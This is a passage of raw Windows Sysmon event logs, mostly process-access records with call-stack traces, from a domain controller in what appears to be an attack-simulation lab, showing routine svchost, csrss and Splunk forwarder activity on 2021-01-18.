13:56:17.372{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:44.652{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-939C-6005-D704-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:44.652{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:44.652{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:44.652{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:44.652{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:44.652{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:44.652{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:44.652{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:44.652{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:44.652{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009468Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:44.652{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-939C-6005-D704-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009467Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:44.652{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-939C-6005-D704-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:44.652{59A5CD1D-939C-6005-D704-00000000A301}4876C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:45.652{59A5CD1D-939D-6005-D804-00000000A301}36244768C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:45.527{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-939D-6005-D804-00000000A301}3624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:45.527{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:45.527{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:45.527{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:45.527{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:45.527{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:45.527{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:45.527{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:45.527{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:45.527{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:45.527{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-939D-6005-D804-00000000A301}3624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:56:45.527{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-939D-6005-D804-00000000A301}3624C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 